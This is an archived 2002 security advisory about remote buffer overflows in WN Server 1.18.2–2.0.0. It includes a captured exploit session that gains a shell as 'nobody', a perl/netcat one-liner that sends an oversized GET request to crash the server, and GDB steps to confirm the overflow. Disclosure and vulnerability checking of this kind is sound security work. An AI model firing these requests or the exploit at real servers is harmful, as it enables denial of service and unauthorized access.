Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web :: Servers :: web5717.htm

WN Server remote buffer overflows
1st Oct 2002 [SBWID-5717]

	WN Server remote buffer overflows


	John Franks’ WN Server versions 1.18.2 through 2.0.0


	In David Endler of iDEFENSE [] security  advisory
	[09.30.2002] :

	 This issue was exlcusively disclosed to iDEFENSE by badc0ded


	Exploitation is possible by issuing WN Server a  long  GET  request.  In
	order to successfully exploit this vulnerability, customized shell  code
	is required to bypass the character filtering that WN Server imposes  on
	the requested URI.

	"WN is a Web server which runs on a wide variety of UNIX  platforms  and
	is freely available at no cost for any use under the terms  of  the  GNU
	General Public License." It is included  in  the  latest  FreeBSD  ports
	collection as well.

	The Mitre Corp.'s Common Vulnerabilities  and  Exposures  (CVE)  Project
	has assigned the identification number CAN-2002-1166 to this issue.



	The following is a snapshot of an exploit at work:

	$ (./wn_bof 0 3; cat) | nc target 80

	Trying ret=0xbfbeb4ec

	$ id

	uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)

	$ uname



	Exploitation of a buffer overflow usually results in one of two  things:
	the targeted host process/application/host crashes,  or  arbitrary  code
	executes. Both have  serious  repercussions,  but  in  most  cases  code
	execution is more threatening in that it could  allow  for  the  further
	usurpation of higher-level privileges on the targeted host.


	wn-1.18.2 - wn-2.0.0, which is included in the current  version  of  the
	FreeBSD Project’s FreeBSD ports  collection,  is  vulnerable.  Take  the
	following steps to determine whether a  specific  WN  implementation  is

	1. Ensure that WN is running and open two terminals. 

	2. In the first terminal execute:

	    $ (perl -e 'print "GET /" . "a"x1600';cat)|nc localhost 80 

	3. In the second terminal, determine the process ID of the child that 

	   was spawned to handle the previous command, and attach GDB to it:

	    # ps ax | grep swn

	      4223 ?? Ss 0:00.29 ./swn

	      4711 ?? S 0:00.01 ./swn

	    # gdb ./swn 4711

	      GNU gdb 4.18

	      Copyright 1998 Free Software Foundation, Inc.


	4. In the second terminal, type 'c' telling GDB to continue. 

	5. In the first terminal, press enter. If at this point the following

	output is returned from GDB, then a vulnerable WN implementation is


	    Program received signal SIGSEGV, Segmentation fault.  0x61616161 in ?? () 



	WN Server 2.4.4 is available at


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH